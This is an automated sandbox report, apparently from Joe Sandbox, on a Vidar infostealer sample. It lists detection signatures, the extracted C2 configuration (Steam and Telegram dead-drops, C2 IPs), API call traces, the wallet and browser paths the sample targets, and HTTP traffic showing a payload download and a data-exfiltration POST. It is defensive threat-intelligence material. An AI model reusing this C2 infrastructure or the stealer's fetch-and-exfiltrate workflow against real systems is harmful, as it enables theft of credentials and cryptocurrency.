Windows Analysis Report
06625899.exe

Overview

General Information

Sample Name:	06625899.exe
Analysis ID:	877001
MD5:	22cd094d925fb41f446ed4db24cc8c35
SHA1:	c316b3fa0e1357ed5815002b0354e8503d5ee038
SHA256:	9edb64bf310212bffcc2fa176b22b570d071fb38873292a1a1ada19f8536231c
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Detected unpacking (overwrites its own PE header)

Yara detected Vidar stealer

Detected unpacking (changes PE section rights)

Tries to steal Crypto Currency Wallets

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Uses known network protocols on non-standard ports

Machine Learning detection for sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

AV process strings found (often used to terminate AV products)

Extensive use of GetProcAddress (often used to hide API calls)

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Found malware configuration

Source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199508624021", "https://t.me/looking_glassbot"], "Botnet": "667e85c8112da056f901292caf82b3ed"}

Machine Learning detection for sample

Source: 06625899.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00415040 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00415040
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00409EC0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,_memset,CryptBinaryToStringA,	0_2_00409EC0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00415180 _malloc,_malloc,CryptUnprotectData,	0_2_00415180
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00401430 _memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,	0_2_00401430
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00414D80 _memset,lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,	0_2_00414D80
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00414FC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00414FC0

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\06625899.exe

Unpacked PE file: 0.2.06625899.exe.400000.0.unpack

Uses 32bit PE files

Source: 06625899.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\06625899.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49684 version: TLS 1.2

Source:	Binary string: C:\yukigusorefu\murebobunuxac\tuju payuxax-nus\w.pdb source: 06625899.exe
Source:	Binary string: uDC:\yukigusorefu\murebobunuxac\tuju payuxax-nus\w.pdb source: 06625899.exe

Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00424100 FindFirstFileW,_wcslen,FindNextFileW,_wcslen,FindNextFileW,	0_2_00424100
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00416500 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00416500
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_004118B0 _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_004118B0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00416B10 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset,	0_2_00416B10
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00411B90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00411B90
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0040BC20 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_strlen,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlen,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,	0_2_0040BC20
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00411DD0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,_memset,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00411DD0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0041AFF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,_memset,_memset,FindNextFileA,FindClose,	0_2_0041AFF0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0040B190 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcat,lstrlen,_memset,	0_2_0040B190
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_004162F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_004162F0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00416770 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose,	0_2_00416770
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00409F60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00409F60

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_0040D1C0 _memset,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,lstrcpy,_strlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,

0_2_0040D1C0

Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49685

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199508624021
Source: Malware configuration extractor	URLs: https://t.me/looking_glassbot

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 188.34.154.187 188.34.154.187
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic	HTTP traffic detected: GET /667e85c8112da056f901292caf82b3ed HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
Source: global traffic	HTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----0606627400761024User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Content-Length: 143185Connection: Keep-AliveCache-Control: no-cache

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.3:49685 -> 188.34.154.187:30303

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown	Network traffic detected: HTTP traffic on port 49684 -> 443

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 28 May 2023 08:46:23 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf

Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.46.113
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.46.113
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.46.113
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187

Source: 06625899.exe, 00000000.00000003.402473646.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/
Source: 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303//
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/667e85c8112da056f901292caf82b3ed
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/667e85c8112da056f901292caf82b3edZ5
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/:
Source: 06625899.exe, 00000000.00000002.413121737.00000000031BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/CVOHV.xlsx
Source: 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/T
Source: 06625899.exe, 00000000.00000003.404755514.00000000008F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/addon.zip
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/addon.zip&u;y
Source: 06625899.exe, 00000000.00000003.404755514.00000000008F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/addon.zip0
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/addon.zip=u&y
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/e5
Source: 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/n
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303;
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.46.113/667e85c8112da056f901292caf82b3ed
Source: 06625899.exe, 00000000.00000002.412555113.00000000008CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.46.113/667e85c8112da056f901292caf82b3ed8
Source: 06625899.exe, 00000000.00000002.412555113.00000000008CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.46.113/667e85c8112da056f901292caf82b3edx
Source: 06625899.exe, 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://23.88.46.113:80
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.46.113:80/
Source: 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://23.88.46.113:80peppppzxc.ziphttps://t.me/looking_glassbotlookataddon.zipMozilla/5.0
Source: 06625899.exe, 00000000.00000002.412510711.0000000000838000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.46.113:8A
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000003.404755514.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000003.402473646.0000000000900000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsup30303/667e85c8112da056f901292caf82b3ed
Source: 06625899.exe, 00000000.00000002.423731237.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 50764714324176067669882221.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 50764714324176067669882221.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 50764714324176067669882221.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 50764714324176067669882221.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dll
Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: 06625899.exe, 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199508624021
Source: 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199508624021openopen_NULL%s
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/V
